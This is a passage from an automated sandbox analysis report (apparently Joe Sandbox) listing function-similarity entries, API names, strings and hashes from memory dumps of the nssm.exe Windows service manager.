                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleWindow
                                                                                                                                                                                                                                  • String ID: %s$%s: %s$%s: %s: %s
                                                                                                                                                                                                                                  • API String ID: 2863861424-3854535108
                                                                                                                                                                                                                                  • Opcode ID: b290d6eed825cbb8d746d6f811c1650d8cd0857ef6c30b17a3d87c39dc499cfa
                                                                                                                                                                                                                                  • Instruction ID: d51581bea7dcd98d7239763cbd516015c64a6006e11e9969fdebf94d78c9d592
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b290d6eed825cbb8d746d6f811c1650d8cd0857ef6c30b17a3d87c39dc499cfa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CA1A13161874582EA66ABA3B4943ED6391B78DBC4F40002AFF4A0B7F6DF3AC9458740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process_snwprintf_s$AllocFreeMessage$Format$DefaultFileLocalNameOpenSendUser
                                                                                                                                                                                                                                  • String ID: :%s:
                                                                                                                                                                                                                                  • API String ID: 977789269-1112191061
                                                                                                                                                                                                                                  • Opcode ID: f14be61598c3c4b4371c60f1a7fc0305079a4aa60e5f42d776f41dcb8c9df6bf
                                                                                                                                                                                                                                  • Instruction ID: ebdad0bdce398d9d23e29def7a2c9509ffee00f48e215307e98612eadc9fb592
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f14be61598c3c4b4371c60f1a7fc0305079a4aa60e5f42d776f41dcb8c9df6bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A615B71604A8192E621DB66F8043DAA3A1FB8D7F4F504329FAAA47AE9DF3CC445C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Free$Process$CloseHandle$CriticalDeleteEnvironmentSectionServiceStringsUnregisterWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 223489879-0
                                                                                                                                                                                                                                  • Opcode ID: 7573bea7c2e7461c55a832f3a498d5ca89d4b2c4cea8ec334ba4278544943132
                                                                                                                                                                                                                                  • Instruction ID: de46d3eaa325261a4840f62cbe60ccbc7ba3efb4caabab2e071f876767e83570
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7573bea7c2e7461c55a832f3a498d5ca89d4b2c4cea8ec334ba4278544943132
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94313035601B80A1EB4ADFE395183E96361BB8CFD9F085538EF0E5B775DE3988848220
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                  • String ID: All
                                                                                                                                                                                                                                  • API String ID: 1231390398-55916349
                                                                                                                                                                                                                                  • Opcode ID: 0d935d43e42af7ce7e0758231c1a4bca96241df8e6942c8a5b8f0c8dbd9a5225
                                                                                                                                                                                                                                  • Instruction ID: adcaba737a8f02d227ffb74b2b56620ddcba6a241e6d8b627618ab2d7a4cd12d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d935d43e42af7ce7e0758231c1a4bca96241df8e6942c8a5b8f0c8dbd9a5225
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E714C76208A8581EB62DB67B4407DA63A5FB8DBD8F448125FF8E877B9DF38C4458700
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: SeServiceLogonRight
                                                                                                                                                                                                                                  • API String ID: 0-347471591
                                                                                                                                                                                                                                  • Opcode ID: a5c9cc1de26450cb07b26a99d338c3a69344a0cf96b88a66afbca407a0f7a53e
                                                                                                                                                                                                                                  • Instruction ID: 9acca0002ab1a0dcd36d4418358f30db5de63f0a62d2cfb18301cdd2d44131d5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5c9cc1de26450cb07b26a99d338c3a69344a0cf96b88a66afbca407a0f7a53e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51517260864086EA11EB67B4513EE6361E7C97D0F450221FF5A8BBFADE38C981C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$File$System$ErrorHandleLast$CloseCompareCreateInformationMove
                                                                                                                                                                                                                                  • String ID: CreateFile()$MoveFile()
                                                                                                                                                                                                                                  • API String ID: 1279283993-2404744241
                                                                                                                                                                                                                                  • Opcode ID: 44ba9b0725bc4b836686bda2954c5f6870c5598847f1b73e3906dc323e29c621
                                                                                                                                                                                                                                  • Instruction ID: 83fb6917b59441b589c6748db39d32c9402b570be8510c8790460265ea435165
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44ba9b0725bc4b836686bda2954c5f6870c5598847f1b73e3906dc323e29c621
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB512B72208B8596EA22DB56F4807DAB3A5F78D7D4F900019FB8947B68DF7CCA45CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Event$ProcessSource$AllocDeregisterErrorFreeLastQueryRegisterReportValue
                                                                                                                                                                                                                                  • String ID: get_string()
                                                                                                                                                                                                                                  • API String ID: 3788940211-896229945
                                                                                                                                                                                                                                  • Opcode ID: 3a6e1a0298e6dc1328a7402d83b68543f89c4948ce9f0ab67e4195a10c464332
                                                                                                                                                                                                                                  • Instruction ID: 1061b80f1ebe0ce06e49b5781a9a4090b8618c9f9ceba09a29774341b73c85dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a6e1a0298e6dc1328a7402d83b68543f89c4948ce9f0ab67e4195a10c464332
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21519FB160478086F762EBA7B8443EA7691B78DBC8F44442AFB8A477B5CF3CC5458B10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0000000140011090: GetProcessHeap.KERNEL32(?,?,?,?,?,00000001400086D1), ref: 0000000140011096
                                                                                                                                                                                                                                    • Part of subcall function 0000000140011090: HeapAlloc.KERNEL32(?,?,?,?,?,00000001400086D1), ref: 00000001400110AA
                                                                                                                                                                                                                                  • _snwprintf_s.LIBCMT ref: 0000000140013F41
                                                                                                                                                                                                                                  • RegisterServiceCtrlHandlerExW.ADVAPI32 ref: 0000000140013FFE
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0000000140014010
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: RegisterEventSourceW.ADVAPI32 ref: 0000000140007183
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: ReportEventW.ADVAPI32 ref: 00000001400071F8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: DeregisterEventSource.ADVAPI32 ref: 0000000140007201
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$HeapRegisterSource$AllocCtrlDeregisterErrorHandlerLastProcessReportService_snwprintf_s
                                                                                                                                                                                                                                  • String ID: NSSM$service->name$service_main()
                                                                                                                                                                                                                                  • API String ID: 3891462411-2082882489
                                                                                                                                                                                                                                  • Opcode ID: 5936586b1f66c6b14b500ea0cdf1371478960174ced60b3e4e3f1d26c9a64aa2
                                                                                                                                                                                                                                  • Instruction ID: 789a3243ef2abc4656db5c4467dcf4d015fdf90dfe3eed548fac9a2a64198488
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5936586b1f66c6b14b500ea0cdf1371478960174ced60b3e4e3f1d26c9a64aa2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52614BB2A04A8086E712DF62E4013DA77A4F78DB98F480229FB4D4B7A9DF7CC945C750
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                  • String ID: All$affinity$setting_get_affinity
                                                                                                                                                                                                                                  • API String ID: 3660427363-3501811323
                                                                                                                                                                                                                                  • Opcode ID: 524ca1e20c19ddccd99b61ade6b56e18b0d3e14a2b61cb8f2410a96d6e06385d
                                                                                                                                                                                                                                  • Instruction ID: 0b03545648fc8d0a394ad8577e801c3952f1d08f3707e3de5c1051d58296662d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 524ca1e20c19ddccd99b61ade6b56e18b0d3e14a2b61cb8f2410a96d6e06385d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57518072608A8182EB61DB6AF4403DA67A1F78DBD8F544115FB8D47BB9DF3DC4858B00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap_snwprintf_s$Process$AllocFreeObjectServiceSingleStatusWait
                                                                                                                                                                                                                                  • String ID: %lu$%s()
                                                                                                                                                                                                                                  • API String ID: 3601813699-699940799
                                                                                                                                                                                                                                  • Opcode ID: 5a3e8f4da7e8bc6144f0cbd492cd1bda74b2830de2919d8f0dd4b05d361fb4ea
                                                                                                                                                                                                                                  • Instruction ID: 4f432000d61e5a2342edbea44b1bbef85402c3e928f06d945fcdb11789466756
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a3e8f4da7e8bc6144f0cbd492cd1bda74b2830de2919d8f0dd4b05d361fb4ea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC516872604A8086E761CB66E8403DA73A1F388BE4F504326EBAD476E8DF39C959C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                                                                                                                                                                                                  • String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
                                                                                                                                                                                                                                  • API String ID: 2527037045-119971955
                                                                                                                                                                                                                                  • Opcode ID: dd9df591da93ab28d7d50a882b3df40737b0c0447a5d466802c528f930362612
                                                                                                                                                                                                                                  • Instruction ID: 10fb05e8db9ff37491dea6446da6f33e2164641a7dd17a498c31277de4be306d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd9df591da93ab28d7d50a882b3df40737b0c0447a5d466802c528f930362612
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68416C35604B4192EA12EFA3F8107DA6761AB8DBD8F844625BB494B7B6DF3CC945C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport_snwprintf_s
                                                                                                                                                                                                                                  • String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
                                                                                                                                                                                                                                  • API String ID: 3915943028-129066941
                                                                                                                                                                                                                                  • Opcode ID: 63263c532c79ade7270f62668f04a15441b35209ca86b4999f5b7e8d482cceb0
                                                                                                                                                                                                                                  • Instruction ID: 84ee73ad31f872f617b5b1d88212e3474588835897ecb64d6b6831630cd2b22c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63263c532c79ade7270f62668f04a15441b35209ca86b4999f5b7e8d482cceb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA416F71208B8586E721DB62F4847DA73A0F78D7A8F800316FB9D43AA9DB7DC545CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$FormatHeap$AllocDefaultFreeLocalProcessUser_snwprintf_s_wcsftime_l
                                                                                                                                                                                                                                  • String ID: NSSM$P$The message which was supposed to go here is missing!$The message which was supposed to go here is too big!$e
                                                                                                                                                                                                                                  • API String ID: 1622592641-1535976118
                                                                                                                                                                                                                                  • Opcode ID: a0af3ebdca29787632267151e3579477297366529410b55b7a11bcf1713b41d6
                                                                                                                                                                                                                                  • Instruction ID: a8958296faa8a15ea512bd411f71029cb49e8a49a296d71c01b1b1030d968080
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0af3ebdca29787632267151e3579477297366529410b55b7a11bcf1713b41d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC317E71614B8592E762DB52F8907DA73A4F7887D4F400529FB8943AB5DF3CC909C700
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: lsa_canon$username_sid
                                                                                                                                                                                                                                  • API String ID: 0-3440772048
                                                                                                                                                                                                                                  • Opcode ID: 7c955e16e51a3b93d9c3f809f2d7c421addbe4ef8c17164685da713682009ca1
                                                                                                                                                                                                                                  • Instruction ID: d9c96c57f6c82d5c82038e822be8808c5095e626a77498df4ffa04209eab73a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c955e16e51a3b93d9c3f809f2d7c421addbe4ef8c17164685da713682009ca1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77515272615A8582DA12EB66F8413EA6361F7C8BD4F444112FF8D8B766DF39C895C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32 ref: 000000014000DB4B
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 000000014000DB64
                                                                                                                                                                                                                                    • Part of subcall function 0000000140006FA0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140006FB2
                                                                                                                                                                                                                                    • Part of subcall function 0000000140006FA0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140006FC8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: RegisterEventSourceW.ADVAPI32 ref: 0000000140007183
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: ReportEventW.ADVAPI32 ref: 00000001400071F8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: DeregisterEventSource.ADVAPI32 ref: 0000000140007201
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$SourceValue$AllocDeregisterErrorLastLocalQueryRegisterReport
                                                                                                                                                                                                                                  • String ID: get_environment()
                                                                                                                                                                                                                                  • API String ID: 1634978944-3013924771
                                                                                                                                                                                                                                  • Opcode ID: 511c641ca0b07486fa2d68978479769c41783af4f4b64e891098fa77b8314390
                                                                                                                                                                                                                                  • Instruction ID: 3a8943d01d4362e664f65f5de00e42dac9ee455b4d5f8c85772ec6445ec61fce
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 511c641ca0b07486fa2d68978479769c41783af4f4b64e891098fa77b8314390
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F416AB6600B4186E722DF62B894B9E72A5F78DBC8F448429FF8A47365CF38D954C610
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
                                                                                                                                                                                                                                  • String ID: create_logging_thread()$logger
                                                                                                                                                                                                                                  • API String ID: 3682172063-2332508298
                                                                                                                                                                                                                                  • Opcode ID: 394f9150480ba38c9becc9d3583cdf0dba1102a9c8eb15b059b774d515849022
                                                                                                                                                                                                                                  • Instruction ID: 3750d178dfea4e8c7d7f934d5676b057532def7f9fa3de7c2d61d0e965585d0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 394f9150480ba38c9becc9d3583cdf0dba1102a9c8eb15b059b774d515849022
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 655119B6604B8196EB61DF62F950B9AB3A1F78CBD4F40442AEF8D43B64DF38D4658700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
